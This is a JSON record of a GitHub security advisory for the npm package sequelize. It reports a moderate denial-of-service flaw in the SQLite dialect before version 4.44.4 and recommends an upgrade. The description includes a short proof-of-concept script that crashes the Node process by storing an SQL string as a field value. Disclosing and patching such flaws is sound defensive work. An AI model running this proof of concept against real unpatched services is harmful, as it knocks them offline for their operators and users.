{
  "Severity": "MODERATE",
  "UpdatedAt": "2020-08-31T18:48:49Z",
  "Package": {
    "Ecosystem": "NPM",
    "Name": "sequelize"
  },
  "Advisory": {
    "DatabaseId": 2780,
    "Id": "MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWZ3NHAtMzZqOS1ycmoz",
    "GhsaId": "GHSA-fw4p-36j9-rrj3",
    "References": [
      {
        "Url": "https://github.com/sequelize/sequelize/pull/11877"
      },
      {
        "Url": "https://github.com/advisories/GHSA-fw4p-36j9-rrj3"
      }
    ],
    "Identifiers": [
      {
        "Type": "GHSA",
        "Value": "GHSA-fw4p-36j9-rrj3"
      }
    ],
    "Description": "Versions of `sequelize` prior to 4.44.4 are vulnerable to Denial of Service (DoS). The SQLite dialect fails to catch a `TypeError` exception for the `results` variable. The `results` value may be undefined and trigger the error on a `.map` call. This may allow attackers to submit malicious input that forces the exception and crashes the Node process.  \n\nThe following proof-of-concept crashes the Node process:  \n```\nconst Sequelize = require('sequelize');\n\nconst sequelize = new Sequelize({\n\tdialect: 'sqlite',\n\tstorage: 'database.sqlite'\n});\n\nconst TypeError = sequelize.define('TypeError', {\n\tname: Sequelize.STRING,\n});\n\nTypeError.sync({force: true}).then(() =\u003e {\n\treturn TypeError.create({name: \"SELECT tbl_name FROM sqlite_master\"});\n});\n```\n\n\n## Recommendation\n\nUpgrade to version 4.44.4 or later.",
    "Origin": "UNSPECIFIED",
    "PublishedAt": "2020-09-03T20:25:33Z",
    "Severity": "MODERATE",
    "Summary": "Denial of Service in sequelize",
    "UpdatedAt": "2020-09-03T20:25:33Z",
    "WithdrawnAt": ""
  },
  "Versions": [
    {
      "FirstPatchedVersion": {
        "Identifier": "4.44.4"
      },
      "VulnerableVersionRange": "\u003c 4.44.4"
    }
  ]
}